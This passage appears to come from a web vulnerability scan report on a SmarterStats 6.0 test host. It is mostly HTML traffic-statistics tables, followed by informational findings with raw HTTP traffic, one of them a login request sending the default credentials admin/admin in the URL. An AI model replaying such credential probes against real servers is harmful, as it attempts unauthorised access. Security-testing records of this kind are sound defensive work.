<td class='ac rank lc'>6</td>

<td class='al '>/<BR>/apptesting.aspx<BR>/cloudscandetails.aspx<BR>/<BR>/learning.aspx<BR>/report.aspx<BR>/ria.aspx<BR>/sales.aspx<BR>/sitemap.aspx<BR>/cloudscanfaqs.aspx</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='al '>/report.aspx</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='al '>/<BR>/cloudscandetails.aspx</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='al '>/test.aspx<BR>/apptesting.aspx<BR>/cloudscandetails.aspx<BR>/learning.aspx<BR>/ria.aspx<BR>/sales.aspx<BR>/report.aspx<BR>/sitemap.aspx<BR>/cloudscanfaqs.aspx<BR>/</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='al '>/test.aspx<BR>/cloudscandetails.aspx<BR>/apptesting.aspx<BR>/learning.aspx<BR>/report.aspx<BR>/ria.aspx<BR>/sales.aspx<BR>/sitemap.aspx<BR>/cloudscanfaqs.aspx<BR>/</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=2>Other Items (16)</td>
<td class='FooterTotal ar rc percentcolrc'>16</td>
</tr>
<tr class=''>
<td class='FooterTotal lc al' colspan=2>Total(s)</td>
<td class='FooterTotal ar rc percentcolrc'>703</td>
</tr>
<tr class='alt'>
<td class='FooterAverages lc al' colspan=2>Average(s)</td>
<td class='FooterAverages ar rc percentcolrc'>27</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Platforms</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="Platforms"> <div class='ReportChart'><img src="/Temp/20226bc24c8e4c89926647164054826e.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Platform</th><th class='ar '>Page Views</th><th class='ar '>Visits</th><th class='ar '>Hits</th><th class='ar rc'>Bandwidth (MB)</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '>Win XP</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
677</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
374</td>
<td class='ar percentcol '>
<div class='percent percent2'></div>
6,097</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
53</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='al '>Win 7 / 2008 R2</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
177</td>
<td class='ar percentcol '>
<div class='percent percent10'></div>
148</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
3,211</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
25</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='al '>Win Vista / 2008</td>

<td class='ar percentcol '>
<div class='percent percent26'></div>
68,935</td>
<td class='ar percentcol '>
<div class='percent percent6'></div>
95</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
70,451</td>
<td class='ar percentcol rc'>
<div class='percent percent26'></div>
4,599</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='al '>Bots, Spiders</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
48</td>
<td class='ar percentcol '>
<div class='percent percent3'></div>
54</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
143</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='al '>Unknown</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
51</td>
<td class='ar percentcol '>
<div class='percent percent3'></div>
48</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
92</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='al '>No User Agent <i>(masked)</i></td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
138</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
19</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
144</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='al '>Linux</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
32</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
18</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
527</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
4</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='al '>Win 2000</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
4</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
16</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
23</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='al '>Mac OS 10.6</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
4</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
5</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
148</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='al '>Win 2003</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
21</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
4</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
31</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=2>Other Items (6)</td>
<td class='FooterTotal ar percentcol'>18</td>
<td class='FooterTotal ar percentcol'>15</td>
<td class='FooterTotal ar percentcol'>368</td>
<td class='FooterTotal ar rc percentcolrc'>2</td>
</tr>
<tr class=''>
<td class='FooterTotal lc al' colspan=2>Total(s)</td>
<td class='FooterTotal ar percentcol'>70,105</td>
<td class='FooterTotal ar percentcol'>796</td>
<td class='FooterTotal ar percentcol'>81,235</td>
<td class='FooterTotal ar rc percentcolrc'>4,694</td>
</tr>
<tr class='alt'>
<td class='FooterAverages lc al' colspan=2>Average(s)</td>
<td class='FooterAverages ar percentcol'>4,381</td>
<td class='FooterAverages ar percentcol'>49</td>
<td class='FooterAverages ar percentcol'>5,077</td>
<td class='FooterAverages ar rc percentcolrc'>293</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Browsers</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="Browsers"> <div class='ReportChart'><img src="/Temp/1d4802d431604203a5254435a7181b01.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Browser</th><th class='ar '>Page Views</th><th class='ar '>Visits</th><th class='ar '>Hits</th><th class='ar rc'>Bandwidth (MB)</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '>Firefox</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
626</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
508</td>
<td class='ar percentcol '>
<div class='percent percent3'></div>
9,680</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
74</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='al '>IE</td>

<td class='ar percentcol '>
<div class='percent percent26'></div>
69,210</td>
<td class='ar percentcol '>
<div class='percent percent7'></div>
144</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
70,552</td>
<td class='ar percentcol rc'>
<div class='percent percent26'></div>
4,608</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='al '>Bots, Spiders</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
48</td>
<td class='ar percentcol '>
<div class='percent percent2'></div>
54</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
143</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='al '>Unknown</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
52</td>
<td class='ar percentcol '>
<div class='percent percent2'></div>
49</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
63</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='al '>No User Agent <i>(masked)</i></td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
138</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
19</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
144</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='al '>Google Chrome</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
10</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
8</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
248</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='al '>Safari</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
9</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
7</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
289</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='al '>Opera</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
9</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
4</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
83</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='al '>Netscape</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
2</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
2</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
2</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
0</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='al '>PlayStation Portable</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
1</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
1</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
31</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
0</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=2>Total(s)</td>
<td class='FooterTotal ar percentcol'>70,105</td>
<td class='FooterTotal ar percentcol'>796</td>
<td class='FooterTotal ar percentcol'>81,235</td>
<td class='FooterTotal ar rc percentcolrc'>4,694</td>
</tr>
<tr class=''>
<td class='FooterAverages lc al' colspan=2>Average(s)</td>
<td class='FooterAverages ar percentcol'>7,010</td>
<td class='FooterAverages ar percentcol'>79</td>
<td class='FooterAverages ar percentcol'>8,123</td>
<td class='FooterAverages ar rc percentcolrc'>469</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Monthly Totals</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="ACT_Monthly_Totals"> <div class='ReportChart'><img src="/Temp/91331a080c0148b0bddd5d75991acb5b.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='al lc'>Month</th><th class='ar '>Page Views</th><th class='ar '>Visits</th><th class='ar '>Hits</th><th class='ar rc'>Bandwidth (MB)</th></tr></thead>
<tbody>
<tr >
<td class='al lc'>October, 2010</td>

<td class='ar percentcol '>
<div class='percent percent26'></div>
70,352</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
1,012</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
84,873</td>
<td class='ar percentcol rc'>
<div class='percent percent26'></div>
4,725</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al'>Total(s)</td>
<td class='FooterTotal ar percentcol'>70,352</td>
<td class='FooterTotal ar percentcol'>1,012</td>
<td class='FooterTotal ar percentcol'>84,873</td>
<td class='FooterTotal ar rc percentcolrc'>4,725</td>
</tr>
<tr class=''>
<td class='FooterAverages lc al'>Average(s)</td>
<td class='FooterAverages ar percentcol'>70,352</td>
<td class='FooterAverages ar percentcol'>1,012</td>
<td class='FooterAverages ar percentcol'>84,873</td>
<td class='FooterAverages ar rc percentcolrc'>4,725</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Weekday Totals</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="ACT_DOW_Totals"> <div class='ReportChart'><img src="/Temp/5bf056fa42644067bd0099f9d59829e2.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='al lc'>Week Day</th><th class='ar '>Page Views</th><th class='ar '>Visits</th><th class='ar '>Hits</th><th class='ar rc'>Bandwidth (MB)</th></tr></thead>
<tbody>
<tr >
<td class='al lc'>Sunday</td>

<td class='ar percentcol '>
<div class='percent percent19'></div>
28,509</td>
<td class='ar percentcol '>
<div class='percent percent20'></div>
109</td>
<td class='ar percentcol '>
<div class='percent percent20'></div>
30,005</td>
<td class='ar percentcol rc'>
<div class='percent percent20'></div>
1,914</td>
</tr>
<tr class="alt">
<td class='al lc'>Monday</td>

<td class='ar percentcol '>
<div class='percent percent26'></div>
37,279</td>
<td class='ar percentcol '>
<div class='percent percent18'></div>
98</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
38,813</td>
<td class='ar percentcol rc'>
<div class='percent percent26'></div>
2,474</td>
</tr>
<tr >
<td class='al lc'>Tuesday</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
116</td>
<td class='ar percentcol '>
<div class='percent percent19'></div>
100</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
1,605</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
11</td>
</tr>
<tr class="alt">
<td class='al lc'>Wednesday</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
120</td>
<td class='ar percentcol '>
<div class='percent percent19'></div>
100</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
1,454</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
15</td>
</tr>
<tr >
<td class='al lc'>Thursday</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
451</td>
<td class='ar percentcol '>
<div class='percent percent25'></div>
131</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
2,015</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
18</td>
</tr>
<tr class="alt">
<td class='al lc'>Friday</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
149</td>
<td class='ar percentcol '>
<div class='percent percent23'></div>
123</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
1,872</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
17</td>
</tr>
<tr >
<td class='al lc'>Saturday</td>

<td class='ar percentcol '>
<div class='percent percent2'></div>
3,481</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
135</td>
<td class='ar percentcol '>
<div class='percent percent3'></div>
5,471</td>
<td class='ar percentcol rc'>
<div class='percent percent2'></div>
245</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al'>Total(s)</td>
<td class='FooterTotal ar percentcol'>70,105</td>
<td class='FooterTotal ar percentcol'>796</td>
<td class='FooterTotal ar percentcol'>81,235</td>
<td class='FooterTotal ar rc percentcolrc'>4,694</td>
</tr>
<tr class=''>
<td class='FooterAverages lc al'>Average(s)</td>
<td class='FooterAverages ar percentcol'>10,015</td>
<td class='FooterAverages ar percentcol'>113</td>
<td class='FooterAverages ar percentcol'>11,605</td>
<td class='FooterAverages ar rc percentcolrc'>671</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Search Engine Breakdown</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="SEO_Engines"> <div class='ReportChart'><img src="/Temp/8494271a59234d898cdd787b473092ed.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Search Engine</th><th class='ar rc'>Visits</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '>Google</td>

<td class='ar percentcol rc'>
<div class='percent percent26'></div>
3</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='al '>Yandex</td>

<td class='ar percentcol rc'>
<div class='percent percent17'></div>
2</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=2>Total(s)</td>
<td class='FooterTotal ar rc percentcolrc'>5</td>
</tr>
<tr class=''>
<td class='FooterAverages lc al' colspan=2>Average(s)</td>
<td class='FooterAverages ar rc percentcolrc'>2</td>
</tr>
</tfoot>
</table></div>
</div>
           <a id="ctl00_MPH_lnkCancel" href="javascript:__doPostBack(&#39;ctl00$MPH$lnkCancel&#39;,&#39;&#39;)"></a>
       |0|hiddenField|__EVENTTARGET||0|hiddenField|__EVENTARGUMENT||5468|hiddenField|__VIEWSTATE|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|53|asyncPostBackControlIDs||ctl00$MPH$btnGenerateReport,,ctl00$MPH$btnShowReport,|0|postBackControlIDs|||86|updatePanelIDs||tctl00$BPH$UpdatePanel2,,tctl00$UpdatePanel1,,tctl00$MPH$UpdatePanel1,,tctl00$MPH$UP1,|0|childUpdatePanelIDs|||82|panelsToRefreshIDs||ctl00$BPH$UpdatePanel2,,ctl00$UpdatePanel1,,ctl00$MPH$UpdatePanel1,,ctl00$MPH$UP1,|2|asyncPostBackTimeout||90|70|formAction||frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO|26|pageTitle||View Report - SmarterStats|51|scriptStartupBlock|ScriptContentNoTags|if (document.ResizeEvent) document.ResizeEvent();
|

5.2. http://vulnerable.smarterstats.6.0.host:9999/Login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Login.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /Login.aspx?shortcutLink=autologin&txtSiteID=admin&txtUser=admin&txtPass=admin HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:28:41 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Set-Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; path=/; HttpOnly
Set-Cookie: SelectedLanguage=; expires=Sat, 10-Oct-2020 03:28:41 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 8885



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   SmarterStats Login - SmarterStats
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


   <script type="text/javascript">
       if (parent.isRoot != null)
           parent.location.href = location.href;
       if (parent.parent.isRoot != null)
           parent.parent.location.href = location.href;
   </script>

<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Login/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="Login" dir="ltr">
   <form name="aspnetForm" method="post" action="Login.aspx?shortcutLink=autologin&amp;txtSiteID=admin&amp;txtUser=admin&amp;txtPass=admin" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>

<script language="javascript">window.onload = function() { if (document.getElementById('ctl00$MPH$txtSiteId') != null) document.getElementById('ctl00$MPH$txtSiteId').focus(); } </script>
<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script src="/WebResource.axd?d=tmbPiP2D38VVojyjJVsEkXwe8X4rw_c60mStWfistR8pyJPOf4ElR79y8d6v9XE45y9Xuon7XBs01GFx3aJPBQ4-yv7YCKPFvc37E1RidaE1&amp;t=634219308989960000" type="text/javascript"></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <div id="ctl00_UpdatePanel1">
   
               <div class="CenteredLogin">
                   <div class="ShadowBox">
                       <div class="LoginBox">
                           <div class="LoginTitle">
                               <div class="RoundedPageTitleLeft">
                                   <div class="RoundedPageTitleRight">
                                       <div class="LoginTitleText">
                                           Login to SmarterStats
                                       </div>
                                   </div>
                               </div>
                           </div>
                           <div class="LoginFrame">
                               <div class="RoundedBottom">
                                   <div class="RoundedLeft">
                                       <div class="RoundedRight">
                                           <div class="RoundedBottomLeft">
                                               <div class="RoundedBottomRight">
                                                   <div id="ctl00_TipTextDiv" class="LoginTipTextContainer">
                                                       <div class="TipTextFailure">Site ID, username or password is incorrect.</div>
                                                   </div>
                                                   <div class="LoginSpacer">
                                                   </div>
                                                   <div class="LoginContent">
                                                       
<div class="LoginSetting">
<div class="LoginLabel">
Site ID
</div>
<input name="ctl00$MPH$txtSiteId" type="text" value="admin" id="ctl00_MPH_txtSiteId" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Username
</div>
<input name="ctl00$MPH$txtUserName" type="text" value="admin" id="ctl00_MPH_txtUserName" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="3" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label>
</span>
</div>

                                                   </div>
                                                   <div class="LoginButtons">
                                                       
<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$BPH$LanguageList\&#39;,\&#39;\&#39;)&#39;, 0)" id="ctl00_BPH_LanguageList" tabindex="3">
       <option selected="selected" value="">Use Browser Language</option>
       <option value="en">English</option>

   </select>
<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http&#x3a;&#x2f;&#x2f;help&#x2e;smartertools&#x2e;com&#x2f;SmarterStats&#x2f;v6&#x2f;default&#x2e;aspx&#x3f;p&#x3d;U&#x26;v&#x3d;6&#x2e;0&#x2e;3932&#x26;lang&#x3d;en&#x2d;US&#x26;page&#x3d;LoginAdmin" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fhelp\x2esmartertools\x2ecom\x2fSmarterStats\x2fv6\x2fdefault\x2easpx\x3fp\x3dU\x26v\x3d6\x2e0\x2e3932\x26lang\x3den\x2dUS\x26page\x3dLoginAdmin','helpwindow',''); return false;" tabindex='6'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='5' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:1px;width:1px;border-width:0px;" />

                                                   </div>
                                               </div>
                                           </div>
                                       </div>
                                   </div>
                               </div>
                           </div>
                       </div>
                   </div>
                   <div class="LoginLinks">
                       <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>SmarterStats Free 6.0</a> | <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>Web Log Analytics & SEO Software</a> | &copy; 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
                   </div>
               </div>
               

                   <script type="text/javascript">
                       $(document).ready(function() {
                           $('select').each(function() {
                               if ($(this).width() > 180) $(this).width(180);
                           });
                       }); </script>

               
           
</div>
       
   

<script type="text/javascript">
//<![CDATA[
WebForm_AutoFocus('ctl00_MPH_txtSiteId');//]]>
</script>
</form>
</body>
</html>


5.3. http://vulnerable.smarterstats.6.0.host:9999/UserControls/Popups/frmHelp.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /UserControls/Popups/frmHelp.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /UserControls/Popups/frmHelp.aspx?url=admin/frmviewreports&extraInfo=ReportItem_ADMIN_Traffic_Trend HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
